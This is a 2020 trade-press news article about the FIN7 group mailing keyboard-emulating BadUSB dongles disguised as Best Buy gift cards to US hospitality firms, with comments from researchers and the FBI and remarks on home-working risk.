Security researchers have come across an attack where an USB dongle designed to surreptitiously behave like a keyboard was mailed to a company under the guise of a Best Buy gift card. This technique has been used by security professionals during physical penetration testing engagements in the past, but it has very rarely been observed in the wild. This time it’s a known sophisticated cybercriminal group who is likely behind it.
The attack was analyzed and disclosed by security researchers from Trustwave SpiderLabs, who learned about it from the business associate of one of their team members. Ziv Mador, vice president for security research Trustwave SpiderLabs, tells CSO that a US company in the hospitality sector received the USB sometime in mid-February.
The package contained an official-looking letter with Best Buy’s logo and other branding elements informing the recipient that they’ve received a $50 gift card for being a regular customer. “You can spend it on any product from the list of items presented on an USB stick,” the letter read. Fortunately, the USB dongle was never inserted into any computers and was passed along for analysis, because the person who received it had security training.
Researchers traced the USB dongle model to a Taiwanese website where it’s being sold for the equivalent of $7 under the name BadUSB Leonardo USB ATMEGA32U4. In 2014, at the Black Hat USA security conference, a team of researchers from Berlin-based Security Research Labs (SRLabs) demonstrated that the firmware of many USB dongles can be reprogrammed so that, when inserted in a computer, it reports that it’s actually a keyboard and starts sending commands that could be used to deploy malware. The researchers dubbed this attack BadUSB and it’s different then just putting malware on an USB stick and relying on the user to open it.
“The fact that they are also cheap and readily available to anyone meant that it was just a matter of time to see this technique used by criminals in the wild,” the Trustwave researchers said in their report. “Since USB devices are ubiquitous, used and seen everywhere, some consider them innocuous and safe. Others can be very curious about the contents of an unknown USB device. If this story teaches us anything, it’s that one should never trust such a device.”
Mador tells CSO that his team didn’t know who the attackers were, but after seeing the information in Trustwave’s report, security researchers Costin Raiu from Kaspersky Lab and Michael Yip commented on Twitter that the malware used and infrastructure match that used by the FIN7 gang.
FIN7, also known as Carbanak, is a financially motivated cybercriminal group that has been targeting US-based companies from the retail, restaurant and hospitality sectors since around 2015. The group is known for using sophisticated techniques to move laterally inside networks and compromised systems with the goal of stealing payment card information. Researchers from security firm Morphisec estimated in the past that FIN7 members earn around $50 million a month from their activities.
The target in the BadUSB attack was a company from the US hospitality sector which is in line with FIN7’s previous targeting, but while the malware (GRIFFON) and infrastructure match FIN7, Raiu tells CSO that it’s the first time he’s seen the group use this physical USB dongle-based attack vector.
“We expect that this campaign dates back to at least December 2019, based on submissions we observed in VirusTotal,” Barry Vengerik, technical director of Technical Operations and Reverse Engineering (TORE) at FireEye, tells CSO. “FireEye Intelligence has been tracking FIN7 sending US-based organizations packages via USPS that contained USB devices configured to deliver malware. When the USB device is connected to a PC, it functions as a virtual keyboard, launching an instance of cmd.exe and executing a PowerShell command crafted to download a remotely hosted PowerShell script designed to launch an instance of the GRIFFON backdoor.”
The FBI also sent a private alert to companies on Thursday confirming that FIN7 is behind these physical USB-based attacks. The agency said it received reports of several packages that contained items including malicious USB devices that were sent to businesses from the retail, restaurant and hotel industries via USPS. The alert contains more technical details, pictures of the packages and USB devices, as well as recommendations to businesses on what information to report back to the FBI in case they’re targeted.
More BadUSB attacks on the way?
Attacks involving USB dongles reprogrammed to act as keyboards have not been used widely until now because they’re not very scalable. One such dongle that’s popular with penetration testers is the USB Rubber Ducky. It’s made by a company called Hak5 and costs $50, which is not a lot of money for a professional to spend, but adds up quickly if you’re an attacker and want to infect many victims, especially since the success rate won’t be 100 percent.
However, at $7 apiece (and probably less if bought in large quantities), malicious dongles like the BadUSB Leonardo device make real-word BadUSB attacks much more viable. Attackers don’t even have to put in much effort, like to create custom firmware to convert off-the-shelf non-malicious USB sticks into malicious ones. They just need to load their custom payload into a ready-made device and mail it.
Even so, attacks of this type are expected to target a relatively small number of carefully selected companies that attackers have already done some research on. According to Trustwave’s Mador, the choice of impersonating Best Buy might not have been an accident. Attackers can use online information to find a company’s contractors and suppliers.
Also, in this case, the rogue letter was sent to the business’s address, but with senior and other key employees now working from home due to the COVID-19 pandemic the risk is even higher.
At work such letters would probably be received by administrative staff, who might then take the device to the IT or security team if they’ve been trained properly, so several people might look at the device before it’s being used, Mador says. However, at home there is no security staff and even if the intended recipient received security awareness training at work, the device might be found and used by one of their family members before they have a chance to stop it.
If hackers compromise a device on the victim’s home network, they’ll eventually succeed to hack into their work computer as well, which will probably provide them with access to the company’s network or systems via a VPN connection. That’s why security professionals are concerned about the forced work-from-home situation that’s currently in effect.
“People know by now that they shouldn’t click on links or open attachments from unknown or untrusted sources,” Mador says. “But when it comes to USB dongles, many still don’t use the right judgement.”
Copyright © 2020 IDG Communications, Inc.